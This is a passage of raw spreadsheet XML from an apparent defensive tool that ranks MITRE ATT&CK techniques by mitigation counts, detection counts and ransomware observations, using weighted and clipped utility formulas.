        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1338634920634921</v>
      </c>
      <c r="AS166" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT166" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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67" spans="1:47" ht="128.1">
      <c r="A167" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.1120000000000001E-2</v>
      </c>
      <c r="B167" s="25">
        <f>SUM(H167,M167,V167)*(1+SUM(AE167,AG167,AI167,AK167,AM167))</f>
        <v>0.61120000000000008</v>
      </c>
      <c r="C167" s="25" t="s">
        <v>750</v>
      </c>
      <c r="D167" s="25" t="s">
        <v>381</v>
      </c>
      <c r="E167" s="25" t="s">
        <v>751</v>
      </c>
      <c r="F167" s="51">
        <v>1</v>
      </c>
      <c r="G167" s="51">
        <v>1</v>
      </c>
      <c r="H167" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I167">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J167">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K167">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L167">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M167" s="25">
        <v>0</v>
      </c>
      <c r="N167" s="51">
        <v>0</v>
      </c>
      <c r="O167" s="51">
        <v>7</v>
      </c>
      <c r="P167" s="51">
        <v>0</v>
      </c>
      <c r="Q167" s="51">
        <v>2</v>
      </c>
      <c r="R167" s="52" t="s">
        <v>752</v>
      </c>
      <c r="S167" s="51">
        <v>8</v>
      </c>
      <c r="T167" s="52" t="s">
        <v>383</v>
      </c>
      <c r="U167" s="51">
        <v>19</v>
      </c>
      <c r="V167" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30000000000000004</v>
      </c>
      <c r="W167">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>27</v>
      </c>
      <c r="X167">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.49090909090909091</v>
      </c>
      <c r="Y167">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.49090909090909091</v>
      </c>
      <c r="Z167">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA167">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB167">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC167" s="29" t="s">
        <v>753</v>
      </c>
      <c r="AD167" s="25" t="str" cm="1">
        <f t="array" ref="AD167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC167)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE167" s="25">
        <f>IF(AD167="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF167" s="25" t="str" cm="1">
        <f t="array" ref="AF167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC167)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG167" s="25">
        <f>IF(AF167="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH167" s="25" t="str" cm="1">
        <f t="array" ref="AH167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC167)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI167" s="25">
        <f>IF(AH167="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ167" s="25" t="str" cm="1">
        <f t="array" ref="AJ167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC167)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK167" s="25">
        <f>IF(AJ167="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL167" s="25" t="str" cm="1">
        <f t="array" ref="AL167">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC167)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM167" s="25">
        <f>IF(AL167="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN167" s="60">
        <v>0</v>
      </c>
      <c r="AO167" s="51">
        <v>0</v>
      </c>
      <c r="AP167" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.1120000000000001E-2</v>
      </c>
      <c r="AQ167" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20373333333333335</v>
      </c>
      <c r="AR167" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20373333333333335</v>
      </c>
      <c r="AS167" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT167" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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68" spans="1:47">
      <c r="A168" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11458666666666667</v>
      </c>
      <c r="B168" s="25">
        <f>SUM(H168,M168,V168)*(1+SUM(AE168,AG168,AI168,AK168,AM168))</f>
        <v>0.47920000000000001</v>
      </c>
      <c r="C168" s="25" t="s">
        <v>754</v>
      </c>
      <c r="D168" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E168" s="25" t="s">
        <v>755</v>
      </c>
      <c r="F168" s="51">
        <v>1</v>
      </c>
      <c r="G168" s="51">
        <v>1</v>
      </c>
      <c r="H168" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I168">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J168">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K168">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L168">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M168" s="25">
        <v>0</v>
      </c>
      <c r="N168" s="51">
        <v>0</v>
      </c>
      <c r="O168" s="51">
        <v>18</v>
      </c>
      <c r="P168" s="51">
        <v>2</v>
      </c>
      <c r="Q168" s="51">
        <v>1</v>
      </c>
      <c r="R168" s="52" t="s">
        <v>756</v>
      </c>
      <c r="S168" s="51">
        <v>12</v>
      </c>
      <c r="T168" s="52" t="s">
        <v>757</v>
      </c>
      <c r="U168" s="51">
        <v>9</v>
      </c>
      <c r="V168" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="W168">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X168">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y168">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z168">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>21</v>
      </c>
      <c r="AA168">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.21</v>
      </c>
      <c r="AB168">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.21</v>
      </c>
      <c r="AC168" s="29" t="s">
        <v>719</v>
      </c>
      <c r="AD168" s="25" t="str" cm="1">
        <f t="array" ref="AD168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE168" s="25">
        <f>IF(AD168="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF168" s="25" t="str" cm="1">
        <f t="array" ref="AF168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG168" s="25">
        <f>IF(AF168="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH168" s="25" t="str" cm="1">
        <f t="array" ref="AH168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI168" s="25">
        <f>IF(AH168="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ168" s="25" t="str" cm="1">
        <f t="array" ref="AJ168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC168)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK168" s="25">
        <f>IF(AJ168="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL168" s="25" t="str" cm="1">
        <f t="array" ref="AL168">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC168)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM168" s="25">
        <f>IF(AL168="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN168" s="52">
        <v>2</v>
      </c>
      <c r="AO168" s="51">
        <v>1</v>
      </c>
      <c r="AP168" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11458666666666667</v>
      </c>
      <c r="AQ168" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15973333333333334</v>
      </c>
      <c r="AR168" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15973333333333334</v>
      </c>
      <c r="AS168" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT168" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU16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69" spans="1:47">
      <c r="A169" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11458666666666667</v>
      </c>
      <c r="B169" s="25">
        <f>SUM(H169,M169,V169)*(1+SUM(AE169,AG169,AI169,AK169,AM169))</f>
        <v>0.47920000000000001</v>
      </c>
      <c r="C169" s="25" t="s">
        <v>758</v>
      </c>
      <c r="D169" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E169" s="25" t="s">
        <v>759</v>
      </c>
      <c r="F169" s="51">
        <v>1</v>
      </c>
      <c r="G169" s="51">
        <v>1</v>
      </c>
      <c r="H169" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I169">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J169">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K169">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L169">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M169" s="25">
        <v>0</v>
      </c>
      <c r="N169" s="51">
        <v>0</v>
      </c>
      <c r="O169" s="51">
        <v>2</v>
      </c>
      <c r="P169" s="51">
        <v>1</v>
      </c>
      <c r="Q169" s="51">
        <v>0</v>
      </c>
      <c r="R169" s="52" t="s">
        <v>760</v>
      </c>
      <c r="S169" s="51">
        <v>15</v>
      </c>
      <c r="T169" s="51" t="s">
        <v>761</v>
      </c>
      <c r="U169" s="51">
        <v>15</v>
      </c>
      <c r="V169" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="W169">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>30</v>
      </c>
      <c r="X169">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Y169">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Z169">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA169">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB169">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC169" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD169" s="25" t="str" cm="1">
        <f t="array" ref="AD169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC169)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE169" s="25">
        <f>IF(AD169="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF169" s="25" t="str" cm="1">
        <f t="array" ref="AF169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG169" s="25">
        <f>IF(AF169="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH169" s="25" t="str" cm="1">
        <f t="array" ref="AH169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI169" s="25">
        <f>IF(AH169="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ169" s="25" t="str" cm="1">
        <f t="array" ref="AJ169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK169" s="25">
        <f>IF(AJ169="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL169" s="25" t="str" cm="1">
        <f t="array" ref="AL169">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC169)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM169" s="25">
        <f>IF(AL169="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN169" s="59">
        <v>2</v>
      </c>
      <c r="AO169" s="51">
        <v>1</v>
      </c>
      <c r="AP169" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11458666666666667</v>
      </c>
      <c r="AQ169" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15973333333333334</v>
      </c>
      <c r="AR169" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15973333333333334</v>
      </c>
      <c r="AS169" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT169" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU16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70" spans="1:47" ht="32.1">
      <c r="A170" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.6533333333333337E-2</v>
      </c>
      <c r="B170" s="25">
        <f>SUM(H170,M170,V170)*(1+SUM(AE170,AG170,AI170,AK170,AM170))</f>
        <v>0.53200000000000003</v>
      </c>
      <c r="C170" s="25" t="s">
        <v>762</v>
      </c>
      <c r="D170" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E170" s="25" t="s">
        <v>763</v>
      </c>
      <c r="F170" s="51">
        <v>1</v>
      </c>
      <c r="G170" s="51">
        <v>1</v>
      </c>
      <c r="H170" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I170">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J170">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K170">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L170">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M170" s="25">
        <v>0</v>
      </c>
      <c r="N170" s="51">
        <v>2</v>
      </c>
      <c r="O170" s="51">
        <v>3</v>
      </c>
      <c r="P170" s="51">
        <v>2</v>
      </c>
      <c r="Q170" s="51">
        <v>0</v>
      </c>
      <c r="R170" s="52" t="s">
        <v>764</v>
      </c>
      <c r="S170" s="51">
        <v>11</v>
      </c>
      <c r="T170" s="52" t="s">
        <v>765</v>
      </c>
      <c r="U170" s="51">
        <v>17</v>
      </c>
      <c r="V170" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="W170">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>28</v>
      </c>
      <c r="X170">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="Y170">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="Z170">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA170">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB170">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC170" s="29" t="s">
        <v>766</v>
      </c>
      <c r="AD170" s="25" t="str" cm="1">
        <f t="array" ref="AD170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC170)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE170" s="25">
        <f>IF(AD170="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF170" s="25" t="str" cm="1">
        <f t="array" ref="AF170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG170" s="25">
        <f>IF(AF170="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH170" s="25" t="str" cm="1">
        <f t="array" ref="AH170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC170)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI170" s="25">
        <f>IF(AH170="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ170" s="25" t="str" cm="1">
        <f t="array" ref="AJ170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK170" s="25">
        <f>IF(AJ170="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL170" s="25" t="str" cm="1">
        <f t="array" ref="AL170">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC170)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM170" s="25">
        <f>IF(AL170="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN170" s="60">
        <v>1</v>
      </c>
      <c r="AO170" s="51">
        <v>0</v>
      </c>
      <c r="AP170" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.6533333333333337E-2</v>
      </c>
      <c r="AQ170" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17733333333333334</v>
      </c>
      <c r="AR170" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17733333333333334</v>
      </c>
      <c r="AS170" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT170" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU17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71" spans="1:47" ht="32.1">
      <c r="A171" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11986666666666665</v>
      </c>
      <c r="B171" s="25">
        <f>SUM(H171,M171,V171)*(1+SUM(AE171,AG171,AI171,AK171,AM171))</f>
        <v>0.53199999999999992</v>
      </c>
      <c r="C171" s="25" t="s">
        <v>767</v>
      </c>
      <c r="D171" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E171" s="25" t="s">
        <v>768</v>
      </c>
      <c r="F171" s="51">
        <v>1</v>
      </c>
      <c r="G171" s="51">
        <v>1</v>
      </c>
      <c r="H171" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I171">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J171">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K171">
